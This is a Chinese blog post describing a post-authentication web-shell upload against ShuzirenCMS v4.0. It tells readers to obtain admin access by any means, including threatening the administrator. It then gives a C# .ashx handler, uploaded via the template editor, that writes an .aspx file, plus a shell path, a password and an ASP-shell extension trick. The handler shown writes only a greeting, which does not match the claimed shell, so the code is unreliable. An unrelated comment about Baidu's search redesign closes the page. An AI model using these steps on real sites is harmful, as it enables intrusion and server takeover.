此漏洞由http://www.t00ls.net/thread-19609-1-1.html引起
楼主Pm我网址后简单看下... 发现Asp Php脚本权限封得死死的整个网站的目录任何一个都不给写入~
测试环境/系统:
数字信息港内容管理系统ShuzirenCMS v4.0 / Windows
不管你社工,自己挖注入,嗅探,恐吓后台管理员要密码 反正要后台权限...
登入后台 > 博客 > 模板管理 > 编辑
上传1.ashx
1.ashx内容:
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
string show="Hey web master,Have a nice day o.O? I hope so! HaHa";
StreamWriter file1= File.CreateText(context.Server.MapPath("4z1.aspx"));
file1.Write(show);
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}
}
访问后生成的一句话路径:
http://路径/4z1.aspx
密码:
RmB321654897123456789
另一个是如果asp权限可写文件
上传aasasa后缀的aspshell
漏洞证明:
文章来源于lcx.cc:ShuzirenCMS v4.0 后台Get Shell
博主评论:百度小范围测试新版搜索结果页,只有部分地区可见,前几天发现时我还以为是被劫持了!改版后的:简洁谈不上,难看倒是真的,十分十分的难看,一点都不习惯!!我当时发现时的状况:https://lcx.cc/post/401/ 8月11日报道:…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论